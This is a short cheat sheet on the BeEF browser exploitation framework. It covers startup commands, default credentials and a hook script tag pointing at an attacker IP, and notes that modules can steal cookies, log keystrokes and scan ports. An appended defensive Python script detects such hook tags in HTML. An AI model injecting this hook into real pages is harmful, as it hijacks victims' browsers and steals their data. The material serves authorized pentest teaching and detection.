Beef xss

Official Documentation: https://beefproject.com/

Cheat Sheet: Beef-xss Commands

Purpose

BeEF (Browser Exploitation Framework) is a penetration testing tool that hooks browsers using malicious JavaScript, allowing command-and-control of the victim’s browser.

Scenarios

  • CTF: Inject a BeEF hook script into a challenge page to gain a hooked browser session and extract cookies or keystrokes.
  • Real world: Demonstrate the impact of XSS by showing persistence, social engineering, or data exfiltration in a controlled engagement.

All needed info to run

  • Start BeEF: beef-xss (serves the web UI at http://127.0.0.1:3000/ui/panel).
  • Default creds: beef / beef.
  • Hook script: <script src="http://<attacker-ip>:3000/hook.js"></script>. Place this in the vulnerable page.
  • After a victim loads the page, their browser appears in the BeEF panel.
  • Modules run exploits such as alert popups, stealing cookies, and launching port scans.
  • Config file: /etc/beef-xss/config.yaml (passwords and ports).

Example commands & outputs

# Start BeEF
$ beef-xss
# Output:
# [*] BeEF server started (http://127.0.0.1:3000/ui/panel)

# Insert hook in vulnerable page
<script src="http://192.168.56.101:3000/hook.js"></script>

# BeEF panel shows hooked browser:
# IP: 192.168.56.102 | Browser: Firefox | OS: Linux
# Modules list available exploitation options

BeEF Basics

  • Insert the <script> hook into an XSS-vulnerable page to hook a browser.
  • BeEF is noisy — alerts and modules are obvious to the victim.
  • Default creds are beef / beef; change them in the config file for security.
  • Only use BeEF for demos or authorized pentests; hooking random browsers is illegal.
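
A defender-side check for the hook tag described above, as an added example that is not part of the original cheat sheet or of BeEF itself: it parses a page's HTML and flags cross-origin <script> tags that match the defaults listed here (the /hook.js path and port 3000). The function and class names and the sample page are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Defaults as given on this page. Both are configurable in config.yaml,
# so an empty result is not proof that a page is clean.
HOOK_PATH = "/hook.js"
BEEF_PORT = 3000

class ScriptSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []  # src value of every <script> tag seen

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def find_hook_candidates(html, page_url):
    """Return (script_url, reasons) for cross-origin scripts matching BeEF defaults."""
    page = urlsplit(page_url)
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        try:
            url = urlsplit(urljoin(page_url, src))  # resolves relative and //host forms
            port = url.port
        except ValueError:
            continue  # malformed URL in the src attribute; nothing to compare
        if (url.scheme, url.netloc) == (page.scheme, page.netloc):
            continue  # same-origin script, not a remote hook
        reasons = []
        if url.path.lower().endswith(HOOK_PATH):
            reasons.append("path ends with /hook.js")
        if port == BEEF_PORT:
            reasons.append("served from port 3000")
        if reasons:
            findings.append((url.geturl(), reasons))
    return findings

# Constructed sample: one legitimate script and one injected hook tag.
SAMPLE = """<html><body><script src="/static/app.js"></script>
<p>comment: <script src="http://192.168.56.101:3000/hook.js"></script></p>
</body></html>"""

if __name__ == "__main__":
    for url, reasons in find_hook_candidates(SAMPLE, "http://192.168.56.102/guestbook"):
        print(url, "->", ", ".join(reasons))
```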
